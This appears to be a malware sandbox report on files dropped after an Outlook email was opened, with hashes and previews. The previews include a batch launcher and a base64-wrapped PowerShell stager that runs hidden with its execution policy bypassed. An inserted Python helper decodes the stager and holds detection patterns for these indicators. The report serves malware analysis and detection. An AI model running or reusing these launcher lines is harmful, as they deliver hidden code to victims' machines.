                          Category:dropped
                          Size (bytes):20971520
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:modified
                          Size (bytes):114688
                          Entropy (8bit):4.689480602989428
                          Encrypted:false
                          SSDEEP:
                          MD5:8FAF8E19CC7E29DD1D2BBBA939F5B9D8
                          SHA1:B7FD80EC56E4384E2F377E94541ACD9224908CC1
                          SHA-256:6B2C18BB7C052285F0A34B86D247FBAAC7AC304824793732D01794C7383B6D51
                          SHA-512:53DEE47146FBDDD1CBBB94302D11A2EB4B8645546A60EC4BAF89B4D34A9A960B27E2FEE1CCD1D7DAB97BB16068F4CBF494BE16B409219C4A1486461A9171A5DE
                          Malicious:false
                          Reputation:unknown
                          Preview:............................................................................`..............z.9..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................(..Y.............z.9..........v.2._.O.U.T.L.O.O.K.:.b.8.8.:.4.d.6.c.f.b.1.5.b.4.6.2.4.c.f.6.b.a.0.2.e.6.5.6.7.9.c.8.5.6.7.8...C.:.\.U.s.e.r.s.\.n.o.r.d.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.1.1.8.T.0.4.4.4.3.6.0.4.8.7.-.2.9.5.2...e.t.l.......P.P............z.9..........................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):163840
                          Entropy (8bit):0.3504357971771905
                          Encrypted:false
                          SSDEEP:
                          MD5:171D8C3FE5A4808BE48B722C56CBA80E
                          SHA1:674F5D6B619A6F3B8DCF1F017BDA6DBADF4955E7
                          SHA-256:D21C83F8AB5C9487B4B148D6740200DFA373AE856BA1D2B2C187A1F1A3840F3E
                          SHA-512:5348D77AEB4852F5C2F57D7A7DC297052E3102EC9EFB804B263FCFE43456678492E011051A79C9281D09F79EF55E9FF2F581A1A77E442280DC8999558009013B
                          Malicious:false
                          Reputation:unknown
                          Process:C:\Windows\System32\wscript.exe
                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):127
                          Entropy (8bit):5.0460351365943525
                          Encrypted:false
                          SSDEEP:
                          MD5:A42EC7EC3C55CF87A3752F85AC004F67
                          SHA1:58A7C90237C3B93F5D576EE4C94D51B7742E906D
                          SHA-256:1A94CA03E4166A116E78906D5F44DF2BDAAA1E75621B8D70E43A8026F868C92D
                          SHA-512:93919B7E6A61A505AB104920C718A6B1F0A775F0CD69B09027E22CB1D34ED46D5325B5DADD4CEECFA05CA77B7506B957D4252AD9FB4273BB9A2022D17F50935A
                          Malicious:true
                          Reputation:unknown
                          Preview:@echo off..powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"..exit 0..
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with very long lines (3344), with no line terminators
                          Category:dropped
                          Size (bytes):3344
                          Entropy (8bit):5.800905293758026
                          Encrypted:false
                          SSDEEP:
                          MD5:8981B86CEADED64BEBE3D2FBE322D235
                          SHA1:FA4D7A7D544523CF1D0974A2779C28DFBA3F9467
                          SHA-256:2D762504F9247A867A3DF449A97A1C344A802E84785BF1A4DF4E557DC8F572EA
                          SHA-512:442F7DAC6BE293CD1ACFB452B73487ED462DD61C9220359A012B68A33F515CF0F6FB59FC1238EC6DF55640F7B83EA47413A138CCC5DF01BFD9A248C20114196A
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          Reputation:unknown
                          Preview:powershell -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdD
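The two wscript-dropped files above form a short chain: the 127-byte batch file launches `1Q5Mu4aI.ps1` from the user's Roaming profile with the execution policy bypassed and the window hidden, and that script relaunches PowerShell with its real body wrapped in `FromBase64String(...)`. The Python triage helper below is added here and is not part of the Joe Sandbox report; it pulls the base64 argument out of the stager text, decodes as much of it as the truncated preview allows (base64 can only be decoded in whole four-character groups, so the dangling tail is dropped), renames the long random variable names so the logic can be read, and tags the launcher lines with the command-line indicators a detection rule would key on. `BAT_PREVIEW` and `STAGER_B64` are copied from the previews on this page; the indicator names and the `$v1`, `$v2`, ... renaming scheme are the author's choice.

```python
import base64
import re

# Constructed inputs: the two dropped-file previews quoted in this report.
# The .bat runs the .ps1 from the user's Roaming profile; the .ps1 relaunches
# PowerShell with a base64-wrapped body. The page cuts that base64 off, so only
# its prefix can be decoded here.
BAT_PREVIEW = (
    'powershell -executionpolicy bypass -WindowStyle hidden '
    '-file "C:\\Users\\user\\AppData\\Roaming\\1Q5Mu4aI.ps1"'
)
STAGER_B64 = (
    "JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4"
    "VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2"
    "ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3"
    "Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwok"
    "cWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0tr"
    "WU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwok"
    "bHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25o"
    "VWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsK"
    "JGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNu"
    "aFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsK"
    "SWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0Mz"
    "eWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFN"
    "ZWJKRm1PdD"
)
PS1_PREVIEW = (
    'powershell -executionpolicy bypass -WindowStyle hidden -c '
    '"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\''
    + STAGER_B64
)

# Command-line indicators worth alerting on. The names are ours, not Joe's.
INDICATORS = {
    "execution-policy-bypass": re.compile(r"-(?:executionpolicy|ep|exec)\s+bypass", re.I),
    "hidden-window": re.compile(r"-(?:windowstyle|w)\s+hidden", re.I),
    "embedded-base64": re.compile(r"FromBase64String", re.I),
    "script-in-appdata-roaming": re.compile(r'\\AppData\\Roaming\\[^"\s]+\.ps1', re.I),
}


def powershell_indicators(cmdline):
    """Return the set of indicator names that match one launcher line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


FROM_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)")


def extract_b64(text):
    """Pull the literal handed to FromBase64String('...'), or None."""
    m = FROM_B64.search(text)
    return m.group(1) if m else None


def decode_prefix(b64):
    """Decode a possibly truncated base64 string. Four characters carry three
    bytes, so a trailing 1-3 characters cannot be decoded and are dropped."""
    usable = len(b64) - len(b64) % 4
    return base64.b64decode(b64[:usable]).decode("utf-8", errors="replace")


# Stager variables are 80-character random strings; real cmdlet/preference
# names are shorter, so a length cut-off separates them cleanly.
LONG_VAR = re.compile(r"\$[A-Za-z0-9_]{32,}")


def rename_variables(script):
    """Replace each long random variable with $v1, $v2, ... in first-seen order."""
    names = {}

    def repl(m):
        return names.setdefault(m.group(0), f"$v{len(names) + 1}")

    return LONG_VAR.sub(repl, script)


def cmdlets_in(script):
    """Sorted, de-duplicated Get-* cmdlets referenced by the decoded script."""
    return sorted(set(re.findall(r"\b(Get-[A-Za-z]+)", script)))


def triage(ps1_text):
    """Summarise one dropped stager: launcher indicators, the decodable part of
    its embedded script, the cmdlets it calls, and a readable rendering."""
    b64 = extract_b64(ps1_text)
    decoded = decode_prefix(b64) if b64 else ""
    return {
        "indicators": powershell_indicators(ps1_text),
        "cmdlets": cmdlets_in(decoded),
        "decoded": decoded,
        "readable": rename_variables(decoded),
    }


if __name__ == "__main__":
    print("bat indicators:", sorted(powershell_indicators(BAT_PREVIEW)))
    result = triage(PS1_PREVIEW)
    print("ps1 indicators:", sorted(result["indicators"]))
    print("cmdlets:", result["cmdlets"])
    print(result["readable"])
```

Run against the page's own previews, the decoded prefix sets `$ErrorActionPreference`, builds a random five-letter string from `(65..90) + (97..122) | Get-Random -Count 5`, reads the current hour and minute with `Get-Date -Format HH` and `Get-Date -Format mm`, stores an offset of 3, and opens an `If` on the minute value; everything after that is cut off on the page, so the helper makes no claim about the branch body. The `-file`-plus-Roaming and `FromBase64String`-plus-hidden-window combinations are the parts to turn into a process-creation rule; the random variable names change per build and are useless as indicators.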
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):30
                          Entropy (8bit):1.2389205950315936
                          Encrypted:false
                          SSDEEP:
                          MD5:20603F35D4A8E3343E0886D193CA4A19
                          SHA1:FFCE9D44386FA188F407EFC95A95ED45F69395A1
                          SHA-256:C8E62E465B724F176FC4D68FA22AFC96EEF196DEA9DDBD4315F139C178BCDA52
                          SHA-512:B3430DEFD7FD0F1AEA939BBA32AEAC11C1C3D4EFBEE3B90FCF4CB70DFD5CADFB87B0D21FBB430CF390EF2D821EAC0A46779113ADECC7D708EA2B9665F8A2FA04
                          Malicious:false
                          Reputation:unknown
                          Preview:....j.........................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.66982247289502
                          Encrypted:false
                          SSDEEP:
                          MD5:70C134159528B40CA22F2ACDF4DD1230
                          SHA1:200C615F86DB701537CD4876C84BF63F7DD62A81
                          SHA-256:B4857FD2C51ED4FA5885989967DE8E76493C33B3F5073B04398D535105418F93
                          SHA-512:4C67D05933CF9BC328F06298DB231E1E1A57236FC59D75ADAE18D39F1ADA026523B0913F65D189742A46A58E00E7FB03F83F8F073A63CE86FBB01050258526A4
                          Malicious:true
                          Reputation:unknown
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):16
                          Entropy (8bit):2.771782221599798
                          Encrypted:false
                          SSDEEP:
                          MD5:3B16E9648F3B7DAFA340BCC881915BFB
                          SHA1:F8C0B28679B0C71FAAE77BE7CE81FE796E7E6E51
                          SHA-256:0114438C2EB5EB5DCEF887D31DC2D717F237254E8E83AD1E949660BF41C6AD45
                          SHA-512:53A514B95AE45B998B334FD7CD4A6E2A31A7630795F852A659083D6C32BFA467BDA04C96B7FF7B130841BE1B96AD5084E939ECFBABE6C2C61E35207239E9C685
                          Malicious:false
                          Reputation:unknown
                          Preview:..n.o.r.d.i.....
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):3.975256228807088
                          Encrypted:false
                          SSDEEP:
                          MD5:DFD25F54949C0F3A06F21FB3C09551E1
                          SHA1:965DDA0A1681B2ED9F669620C24685DD9FAE48C2
                          SHA-256:EE2AD246CC3EB4647F68E0D8A91611AAF15B8F22B82FDCEA3C161D0B71EEE7C2
                          SHA-512:24C646DCE7679CBF34DE9350B2DFA90A38BD12382BD7102B4633136B221925873C73346BA1551A0EDAF6D2A5FBCAADD7931A2F9D8923592C05F00853286E4228
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......(..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.989950306244693
                          Encrypted:false
                          SSDEEP:
                          MD5:2CD6A75F651A41020BE3563BEE39775A
                          SHA1:36EB49803074555B56488D83785F0546611F8CF9
                          SHA-256:662CB30F612703966223E8E1572CA5DC1DE322D271FC22443172271A25CDB0D8
                          SHA-512:8A77BA85F26D84A693AA406FDAE1628F1DEA7250A708502BCFDAB8F320F9C4C2A6E802A24BE372E105FAB92551B50FE6BEE162867AB473C05D6DDE42C74D24F6
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....@+...9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2691
                          Entropy (8bit):3.9977150031221433
                          Encrypted:false
                          SSDEEP:
                          MD5:3402C893E605A07E4926B8468194D484
                          SHA1:FA4AFF94465F620C487E00E216F9615D009B1FD6
                          SHA-256:01F4497594F3AC253DDD1F68947E805323113BFA756665B94350C470732CCBB0
                          SHA-512:986DCBCD41545F112E182F05ADBF6DBDA1CE90E82DD3D45EE52AFA39961975E0045F3FEE28B36910B2855A838035ACD83A1FC1C3E4780DC0A499363983A0B6A3
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.9899153180013247
                          Encrypted:false
                          SSDEEP:
                          MD5:ADAEE08263D1B2C6D9981F66C18507B2
                          SHA1:0DB84C2F0C08E825A32567F79102877A46D0894E
                          SHA-256:6FE870D7064F54949D99269B34D77FEE4CBCC5C60BD8B90548CB1A47F1F66F12
                          SHA-512:D816339C00DC02159CA89DF9A5E7B3FB1FDE463E1DB967DE5E45BA334E5070E3353E350E00BA75530BF0E84D330EBE2C3AA4E4C3A8CA28F27BC4665363FC5A70
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.........9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.975977254126674
                          Encrypted:false
                          SSDEEP:
                          MD5:6A0FAFC707EF6432AB4F76CD8856698D
                          SHA1:E009755B0047ABBAF2FE8AD17C69E6D6DA4D42F2
                          SHA-256:687A9025E0EAAE3D2FEA1C00758C77D5BF7B7EBCDA3349ABE9542F88CECABE13
                          SHA-512:DA39787606E79CB7E1D6C2C514622BE9C8901DA93C64C375EE133463C7DB216096191F92051C65E9C60B9CC47B3929143C3A181D40602CC931FBFBA4DC3A3B6B
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,...... ..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2681
                          Entropy (8bit):3.9853918178028818
                          Encrypted:false
                          SSDEEP:
                          MD5:4D7463D0302D82AB702AC46619BD8625
                          SHA1:D3BD7B50A653665B1EB4861342FAAC85F7A4A96E
                          SHA-256:92910EA9D86102A0EF63333176A60CBCE80D58F848483B141DB3B37B936B9C8C
                          SHA-512:6A1916CA431ED443D385845F825BFD3382B0DECA133E29010E518DC5E64147E4E55747A7586056A9A7417FF445999B5CB5A9E50F7A1301DE1F650743A7BCF705
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....i.~.9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Microsoft Outlook email folder (>=2003)
                          Category:dropped
                          Size (bytes):271360
                          Entropy (8bit):1.4055881355660447
                          Encrypted:false
                          SSDEEP:
                          MD5:6DF7D894F919B182B896176F20BD1C79
                          SHA1:6EF4AAE61441D8C7B46BCD9D081E784CCF2012C9
                          SHA-256:407AB6C3F16E3503C5ABDEFB2D8F9C62BD687A3D2CCDC883ACE66CF6F83F4457
                          SHA-512:05D45EFCB8E83769A05EF316FFE8D1899AD95C17D79FB5478EC256971781A74FD0AB99BDC9D61B7ED6B2968F74985DADEEF80C20AB08A1FCD91BFE28D13E4CE7
                          Malicious:true
                          Reputation:unknown
                          Preview:!BDN5.dSM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@.........Q.-.".....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):1.6962222964943536
                          Encrypted:false
                          SSDEEP:
                          MD5:7091A489C4EEEE4EC393F5C05EDE4C2F
                          SHA1:275B40CBD1CE3880C49812C28EC8E038D0500354
                          SHA-256:35972F3D994C080EF7A13E93CC9DECA05DABBD741BAA0BFB56477415ED4BA4E9
                          SHA-512:226FEAF861390D78FD26F4A204E57487A9B802355E357A96C034B42FC2E6E0A182FD401FA49B3E78EF9677C8D3D7B02D6EF0E9381472889F9D55C1F59C8613C7
                          Malicious:true
                          Reputation:unknown
                          Preview:./.DC...8...........DT.z.9....................#.!BDN5.dSM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@.........Q.-.".DT.z.9.......B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
